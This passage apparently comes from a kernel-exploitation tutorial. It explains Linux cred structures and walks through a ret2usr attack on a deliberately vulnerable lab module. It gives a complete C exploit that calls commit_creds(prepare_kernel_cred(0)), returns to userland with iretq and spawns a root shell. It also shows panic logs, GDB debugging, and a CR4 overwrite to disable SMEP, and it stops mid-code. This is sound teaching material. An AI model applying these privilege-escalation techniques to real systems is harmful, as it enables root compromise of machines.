	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	
	/* ... */
} __randomize_layout;

These fields are all unsigned int fields, and they represent what you would expect - the UID, GID, and a few other less common IDs for other operations (such as the FSUID, which is checked when accessing a file on the file system). As you can expect, overwriting one or more of these fields is likely a pretty desirable goal.
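Four of these fields can be observed from userspace: the Uid: line of /proc/<pid>/status lists the real, effective, saved and filesystem UID of a task, in that order. A small sketch for reading them, where read_task_uids is a hypothetical helper name:

```c
#include <stdio.h>

/* Hypothetical helper: parse the "Uid:" line of a /proc/<pid>/status-style stream.
 * The four values are, in order: real, effective, saved and filesystem UID.
 * Returns 0 on success, -1 if no well-formed Uid line is found. */
int read_task_uids(FILE *status, unsigned int ids[4]) {
    char line[256];

    while (fgets(line, sizeof(line), status)) {
        /* whitespace in the format also matches the tabs used by the kernel */
        if (sscanf(line, "Uid: %u %u %u %u", &ids[0], &ids[1], &ids[2], &ids[3]) == 4)
            return 0;
    }
    return -1;
}
```

Running it on /proc/self/status before and after an exploit is a quick way to confirm which IDs actually changed; a fully escalated task should show 0 for all four.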

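Note the __randomize_layout here at the end! This is an annotation for the kernel's structure layout randomization (randstruct) compiler feature. When that option is enabled, the order of the fields is shuffled at build time, making it harder to target the structure!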

task_struct

The kernel needs to store information about each running task, and to do this it uses the task_struct structure. Each kernel task has its own instance.

struct task_struct {
    	/* ... */
    
	/*
	 * Pointers to the (original) parent process, youngest child, younger sibling,
	 * older sibling, respectively.  (p->father can be replaced with
	 * p->real_parent->pid)
	 */

	/* Real parent process: */
	struct task_struct __rcu	*real_parent;

	/* Recipient of SIGCHLD, wait4() reports: */
	struct task_struct __rcu	*parent;

	/*
	 * Children/sibling form the list of natural children:
	 */
	struct list_head		children;
	struct list_head		sibling;
	struct task_struct		*group_leader;

	/* ... */    

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

    	/* ... */
};

The task_struct instances are stored in a circular doubly linked list, with the global kernel variable init_task being the first one. Each task_struct then links to the next.

Along with linking data, the task_struct also (more importantly) stores real_cred and cred, which are both pointers to a cred struct. The difference between the two is explained here:

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */

In effect, cred is the set of permissions used when we are trying to act on something, and real_cred the set used when something is trying to act on us. The majority of the time, both will point to the same structure, but a common exception is with setuid executables, which will modify cred but not real_cred.

So, which set of credentials do we want to target with an arbitrary write? Honestly, I'm not entirely sure - it feels as if we want to update cred, as that will change our abilities to read and execute files. Despite that, I have seen writeups overwrite real_cred, so perhaps I am wrong in that - though, again, they usually point to the same struct and therefore would have the same effect.

Once I work it out, I shall update this (TODO!).

prepare_kernel_cred() and commit_creds()

As an alternative to overwriting cred structs in the unpredictable kernel heap, we can call prepare_kernel_cred() to generate a new valid cred struct and commit_creds() to overwrite the real_cred and cred of the current task_struct.

prepare_kernel_cred()

The function can be found here, but there's not much to say - it allocates a new cred struct called new, copies the old credentials into it, drops its reference to the old struct and returns new.

If NULL is passed as the argument, it will return a new set of credentials that match the init_task credentials, which default to root credentials. This is very important, as it means that calling prepare_kernel_cred(0) results in a new set of root creds!

This last part is actually not true on newer kernel versions - check out the Debugging a Kernel Module section!

commit_creds()

This function is found here, but ultimately it will update task->real_cred and task->cred to the new credentials:

rcu_assign_pointer(task->real_cred, new);
rcu_assign_pointer(task->cred, new);

Resources and References

Kernel ROP - ret2usr

ROPpety boppety, but now in the kernel

Introduction

By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer; the only question is where it should point.

The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0)), and overwrite the return pointer to point there.

Vulnerable Module

Note that the kernel version here is 6.1, due to some added protections we will come to later.

The relevant code is here:

static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    char buffer[0x20];

    printk(KERN_INFO "Testing...");
    memcpy(buffer, buf, 0x100);

    printk(KERN_INFO "Yes? %s", buffer);

    return 0;
}

As we can see, it's a size 0x100 memcpy into an 0x20 buffer. Not the hardest thing in the world to spot. The second printk call here is so that buffer is used somewhere, otherwise it's just optimised out by the compiler and the entire function just becomes xor eax, eax; ret!

Exploitation

Assembly to escalate privileges

Firstly, we want to find the location of prepare_kernel_cred() and commit_creds(). We can do this by reading /proc/kallsyms, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.

For obvious reasons, you require root permissions to read this file!

~ # cat /proc/kallsyms | grep cred
[...]
ffffffff81066e00 T commit_creds
ffffffff81066fa0 T prepare_kernel_cred
[...]
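If you would rather resolve the addresses from the exploit itself than copy them by hand, a minimal sketch could look like the following. The helper names parse_kallsyms_line and lookup_symbol are my own, and the code assumes the "address type name" line format shown above.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms-style line ("<hex addr> <type> <name>").
 * Returns 1 and stores the address if the symbol name matches exactly. */
int parse_kallsyms_line(const char *line, const char *wanted, uint64_t *addr) {
    assert(line != NULL && wanted != NULL && addr != NULL);
    uint64_t value;
    char type;
    char name[256];
    if (sscanf(line, "%" SCNx64 " %c %255s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = value;
    return 1;
}

/* Scan a kallsyms-format file for a symbol. Returns 0 if the symbol is
 * not found or the file cannot be opened. */
uint64_t lookup_symbol(const char *path, const char *wanted) {
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return 0;
    char line[512];
    uint64_t addr = 0;
    while (fgets(line, sizeof line, f) != NULL) {
        if (parse_kallsyms_line(line, wanted, &addr))
            break;
    }
    fclose(f);
    return addr;
}
```

Calling lookup_symbol("/proc/kallsyms", "commit_creds") as root in the VM should then give the same value as the grep above.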

Now we know the locations of the two important functions. After that, the assembly is pretty simple. First we call prepare_kernel_cred(0):

xor    rdi, rdi
mov    rcx, 0xffffffff81066fa0
call   rcx

Then we call commit_creds() on the result (which is stored in RAX):

mov    rdi, rax
mov    rcx, 0xffffffff81066e00
call   rcx

We can throw this directly into the C code using inline assembly:

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
        "call rcx;"

        "mov rdi, rax;"
        "movabs rcx, 0xffffffff81066e00;"   // commit_creds
        "call rcx;"
        ".att_syntax;"                      // switch back so the rest of the file still assembles
    );
}

Overflow

The next step is overflowing. The 7th qword overwrites RIP:

// overflow
uint64_t payload[7];

payload[6] = (uint64_t) escalate;

write(fd, payload, 0);
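The snippet above leaves the first six qwords uninitialised, which works because the module ignores the count argument and copies 0x100 bytes regardless. A slightly tidier sketch, with a hypothetical build_overflow helper and an arbitrary padding value, might be:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RET_INDEX 6  /* the 7th qword overwrites the saved RIP, as stated above */

/* Fill everything before the return address with a recognisable filler,
 * then place the target at RET_INDEX. Returns the number of qwords used. */
size_t build_overflow(uint64_t *payload, size_t n_qwords, uint64_t target) {
    assert(payload != NULL && n_qwords > RET_INDEX);
    for (size_t i = 0; i < RET_INDEX; i++)
        payload[i] = 0x4141414141414141ULL;  /* arbitrary padding */
    payload[RET_INDEX] = target;
    return RET_INDEX + 1;
}
```

In the exploit this would be called as build_overflow(payload, 7, (uint64_t) escalate) before the write().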

Finally, we create a get_shell() function we call at the end, once we've escalated privileges:

void get_shell() {
    system("/bin/sh");
}

int main() {
    // [ everything else ]
    
    get_shell();
}

Returning to userland

If we run what we have so far, we fail and the kernel panics. Why is this?

The reason is that once the kernel executes commit_creds(), it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).

What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalated privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!

We can store them as follows:

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

void save_state() {
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions to escalate() that run after the privileges are acquired:

uint64_t user_rip = (uint64_t) get_shell;

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	"call rcx;"
        
        "mov rdi, rax;"
	"movabs rcx, 0xffffffff81066e00;"   // commit_creds
	"call rcx;"

        // restore all the registers
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs instruction). The RIP register is updated to point to get_shell and pop a shell.

If we compile it statically, load it into initramfs.cpio and run it, we can see that our privileges are elevated!

$ gcc -static -o exploit exploit.c
[...]
$ ./run.sh
~ $ ./exploit 
[*] Saving state
[+] Saved state
FD: 3
[*] Returned to userland
~ # id
uid=0(root) gid=0(root)

We have successfully exploited a ret2usr!

Understanding the restoration

How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a literal StackOverflow post, or another one.

GS - limited segmentation. The contents of the GS register are swapped with one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs enables the process to obtain a pointer to kernel data structures.
- Has to swap back to user space
SS - Stack Segment
- Defines where the stack is stored
- Must be reverted back to the userland stack
RSP
- Same as above, really
CS - Code Segment
- Defines the memory location that instructions are stored in
- Must point to our user space code
RFLAGS - various things

GS is changed back via the swapgs instruction. All others are changed back via iretq, the QWORD variant of the iret family of Intel instructions. iretq is designed specifically for returning from exceptions and interrupts, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:

Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq.
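The quoted passage only names EIP, CS and EFLAGS, but in 64-bit mode iretq also pops RSP and SS, giving five values in total. As a rough sketch, the frame it expects can be written as a struct. The iret_frame and make_user_frame names are mine, not anything from the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Layout iretq pops in 64-bit mode, lowest address (top of stack) first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Build a frame that returns to user mode. The low two bits of a segment
 * selector hold the privilege level, so a ring 3 return needs them to be 3. */
struct iret_frame make_user_frame(uint64_t rip, uint64_t cs, uint64_t rflags,
                                  uint64_t rsp, uint64_t ss) {
    assert((cs & 3) == 3 && (ss & 3) == 3);
    struct iret_frame frame = { rip, cs, rflags, rsp, ss };
    return frame;
}
```

Since the stack grows downwards, pushing SS first and RIP last (as escalate() does) produces exactly this layout in memory.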

Final Exploit

The final version

// gcc -static -o exploit exploit.c

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

void get_shell(void){
    puts("[*] Returned to userland");
    system("/bin/sh");
}

uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;

uint64_t user_rip = (uint64_t) get_shell;

void save_state(){
    puts("[*] Saving state");

    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    puts("[+] Saved state");
}

void escalate() {
    __asm__(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"
        "movabs rcx, 0xffffffff81066fa0;"   // prepare_kernel_cred
	    "call rcx;"
        
        "mov rdi, rax;"
	    "movabs rcx, 0xffffffff81066e00;"   // commit_creds
	    "call rcx;"

        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_rsp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

int main() {
    save_state();

    // communicate with the module
    int fd = open("/dev/kernel_rop", O_RDWR);
    printf("FD: %d\n", fd);

    // overflow
    uint64_t payload[7];

    payload[6] = (uint64_t) escalate;

    write(fd, payload, 0);
}

Debugging a Kernel Module

A practical example

Trying on the Latest Kernel

Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The addresses of commit_creds() and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:

commit_creds           0xffffffff81077390
prepare_kernel_cred    0xffffffff81077510

The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.

Instead of an elevated shell, we get a kernel panic, with the following data dump:

[    1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
[    1.472064] #PF: supervisor read access in kernel mode
[    1.472064] #PF: error_code(0x0000) - not-present page
[    1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0 
[    1.472064] Oops: Oops: 0000 [#1] SMP
[    1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G        W  O       6.10.0-rc5 #7
[    1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.472064] RIP: 0010:commit_creds+0x29/0x180
[    1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[    1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[    1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[    1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[    1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[    1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[    1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[    1.472064] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    1.472064] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[    1.472064] Call Trace:
[    1.472064]  <TASK>
[    1.472064]  ? show_regs+0x64/0x70
[    1.472064]  ? __die+0x24/0x70
[    1.472064]  ? page_fault_oops+0x14b/0x420
[    1.472064]  ? search_extable+0x2b/0x30
[    1.472064]  ? commit_creds+0x29/0x180
[    1.472064]  ? search_exception_tables+0x4f/0x60
[    1.472064]  ? fixup_exception+0x26/0x2d0
[    1.472064]  ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
[    1.472064]  ? __bad_area_nosemaphore+0x15d/0x220
[    1.472064]  ? find_vma+0x30/0x40
[    1.472064]  ? bad_area_nosemaphore+0x11/0x20
[    1.472064]  ? exc_page_fault+0x284/0x5c0
[    1.472064]  ? asm_exc_page_fault+0x2b/0x30
[    1.472064]  ? abort_creds+0x30/0x30
[    1.472064]  ? commit_creds+0x29/0x180
[    1.472064]  ? x64_sys_call+0x146c/0x1b10
[    1.472064]  ? do_syscall_64+0x50/0x110
[    1.472064]  ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
[    1.472064]  </TASK>
[    1.472064] Modules linked in: kernel_rop(O)
[    1.472064] CR2: 0000000000000000
[    1.480065] ---[ end trace 0000000000000000 ]---
[    1.480065] RIP: 0010:commit_creds+0x29/0x180
[    1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[    1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[    1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[    1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[    1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[    1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[    1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[    1.484065] FS:  000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    1.484065] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[    1.488065] Kernel panic - not syncing: Fatal exception
[    1.488065] Kernel Offset: disabled
[    1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---

I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!

One thing we can notice is that the error here is listed as a NULL pointer dereference. We can see that the error is thrown in commit_creds():

[    1.480065] RIP: 0010:commit_creds+0x29/0x180

We can check the source here, but chances are that the parameter passed to commit_creds() is NULL - this appears to be the case, since RDI is shown to be 0 above!
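When triaging a lot of panics, it can help to pull the faulting symbol and offset out of the RIP line automatically. This is only a sketch, assuming the "RIP: selector:symbol+offset/size" format seen in the dump above; the oops_rip struct and parse_oops_rip helper are hypothetical names of my own.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

struct oops_rip {
    unsigned cs;        /* code segment selector, 0x10 in the dump above */
    char symbol[64];    /* function the fault happened in */
    unsigned offset;    /* offset of the faulting instruction within it */
    unsigned size;      /* total size of the function */
};

/* Parse a line such as "[ 1.48] RIP: 0010:commit_creds+0x29/0x180".
 * Returns 1 on success, 0 if the line has no symbolised RIP. */
int parse_oops_rip(const char *line, struct oops_rip *out) {
    assert(line != NULL && out != NULL);
    const char *p = strstr(line, "RIP: ");
    if (p == NULL)
        return 0;
    int fields = sscanf(p, "RIP: %x:%63[^+]+%x/%x",
                        &out->cs, out->symbol, &out->offset, &out->size);
    return fields == 4;
}
```

A raw address with no symbol (as in the SMEP panic later on, where RIP points into userland) is reported as a failure rather than guessed at.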

Opening a GDBserver

In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.

What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.

$ gdb kernel_rop.ko
pwndbg> target remote :1234
pwndbg> b *0xffffffff81077390

We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:

pwndbg> info reg rdi
rdi            0x0                 0

This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:

pwndbg> info reg rax
rax            0x0                 0

This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!

Let's compare the differences in prepare_kernel_cred() code between kernel version 6.1 (first) and version 6.10 (second):

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

	validate_creds(old);

	*new = *old;
	new->non_rcu = 0;
	atomic_long_set(&new->usage, 1);
	set_cred_subscribers(new, 0);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);

	// [...]
	
	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;

	put_cred(old);
	validate_creds(new);
	return new;

error:
	put_cred(new);
	put_cred(old);
	return NULL;
}

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	if (WARN_ON_ONCE(!daemon))
		return NULL;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	old = get_task_cred(daemon);

	*new = *old;
	new->non_rcu = 0;
	atomic_long_set(&new->usage, 1);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);

	// [...]

	new->ucounts = get_ucounts(new->ucounts);
	if (!new->ucounts)
		goto error;

	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;

	put_cred(old);
	return new;

error:
	put_cred(new);
	put_cred(old);
	return NULL;
}

The last and first parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 6.1, it falls back to init_cred, the credentials of init_task:

if (daemon)
    old = get_task_cred(daemon);
else
    old = get_cred(&init_cred);

i.e. if daemon is NULL, use init_cred. On 6.10, the behaviour is altogether different:

if (WARN_ON_ONCE(!daemon))
    return NULL;

If daemon is NULL, return NULL - hence our issue!

Unfortunately, there's no way to bypass this easily! We can fake cred structs, and if we can leak init_task we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)!
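To illustrate the difference, here is a toy userland model of the 6.10 behaviour and of the "pass a known root task instead of NULL" idea mentioned above. None of this is kernel code: every toy_ name is a hypothetical stand-in, and a task is reduced to nothing more than a uid.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins, NOT kernel code: a task only carries a uid here. */
struct toy_task { unsigned uid; };
struct toy_cred { unsigned uid; };

static struct toy_cred toy_new_cred;     /* stands in for the cred_jar allocation */
static unsigned toy_current_uid = 1000;  /* uid of the "current" process */

/* Models the 6.10 behaviour: a NULL daemon yields NULL instead of root creds. */
struct toy_cred *toy_prepare_kernel_cred(const struct toy_task *daemon) {
    if (daemon == NULL)
        return NULL;
    toy_new_cred.uid = daemon->uid;
    return &toy_new_cred;
}

/* Models commit_creds(): it dereferences its argument, so NULL must never get here. */
int toy_commit_creds(const struct toy_cred *new_cred) {
    assert(new_cred != NULL);
    toy_current_uid = new_cred->uid;
    return 0;
}

/* Escalate by cloning the credentials of a known root task such as init_task. */
int toy_escalate(const struct toy_task *root_task) {
    struct toy_cred *cred = toy_prepare_kernel_cred(root_task);
    if (cred == NULL)
        return -1;  /* in the real exploit this was the NULL dereference */
    return toy_commit_creds(cred);
}
```

In the model, toy_escalate(NULL) fails cleanly while toy_escalate(&init) with a uid 0 task succeeds, which mirrors why a leaked init_task address is enough to make the old technique work again.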

SMEP

Supervisor Memory Execute Protection

If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).

In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can stop SMEP from interfering with our exploit.

We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64 is not notable):

    -cpu qemu64,+smep

Kernel ROP - Disabling SMEP

An old technique

Setup

Using the same setup as ret2usr, we make one single modification in run.sh, adding the -cpu line:

#!/bin/sh

# the -cpu line below is the only addition; keep comments off the command
# itself, as anything after a backslash breaks the line continuation
qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
    -monitor /dev/null \
    -nographic \
    -no-reboot \
    -smp cores=2 \
    -cpu qemu64,+smep \
    -s

Now if we load the VM and run our exploit from last time, we get a kernel panic.

Kernel Panic

[    1.628455] Yes? �U"��
[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode
[    1.635878] #PF: error_code(0x0011) - permissions violation
[    1.637930] PGD 1296067 P4D 1296067 PUD 1295067 PMD 1291067 PTE 7c52025
[    1.639639] Oops: 0011 [#1] SMP
[    1.640632] CPU: 0 PID: 30 Comm: exploit Tainted: G           O       6.1.0 #6
[    1.646144] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[    1.647030] RIP: 0010:0x4016b9
[    1.648108] Code: Unable to access opcode bytes at 0x40168f.
[    1.648952] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.649603] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.650321] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.651031] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.651743] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.652455] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.653218] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.654086] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.655452] Call Trace:
[    1.656167]  <TASK>
[    1.656846]  ? do_syscall_64+0x3d/0x90
[    1.658073]  ? entry_SYSCALL_64_after_hwframe+0x46/0xb0
[    1.660144]  </TASK>
[    1.660835] Modules linked in: kernel_rop(O)
[    1.662360] CR2: 00000000004016b9
[    1.663362] ---[ end trace 0000000000000000 ]---
[    1.664702] RIP: 0010:0x4016b9
[    1.665386] Code: Unable to access opcode bytes at 0x40168f.
[    1.666167] RSP: 0018:ffffb973400c7e68 EFLAGS: 00000286
[    1.668501] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: 00000000ffffefff
[    1.669777] RDX: 00000000ffffefff RSI: 00000000ffffffea RDI: ffffb973400c7d08
[    1.670710] RBP: 0000000000000000 R08: ffffffffb7ca6448 R09: 0000000000004ffb
[    1.672122] R10: 000000000000009b R11: ffffffffb7c8f2e8 R12: ffffb973400c7ef8
[    1.672795] R13: 00007ffdfe225520 R14: 0000000000000000 R15: 0000000000000000
[    1.673471] FS:  0000000001b57380(0000) GS:ffff9c1b07800000(0000) knlGS:0000000000000000
[    1.673854] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.674124] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
[    1.674576] Kernel panic - not syncing: Fatal exception
[    1.689999] Kernel Offset: 0x36200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[    1.695855] ---[ end Kernel panic - not syncing: Fatal exception ]---

It's worth noting what it looks like for the future - especially these 3 lines:

[    1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[    1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[    1.633781] #PF: supervisor instruction fetch in kernel mode

Overwriting CR4

So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val). This function quite literally overwrites CR4.

Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):

~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4

Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:

[    1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0

CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
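The arithmetic is just a single bit clear. As a quick sanity check, with CR4_SMEP_BIT and cr4_without_smep being names of my own choosing:

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20  /* zero-indexed, as described above */

/* Return cr4 with the SMEP bit cleared and every other bit untouched. */
uint64_t cr4_without_smep(uint64_t cr4) {
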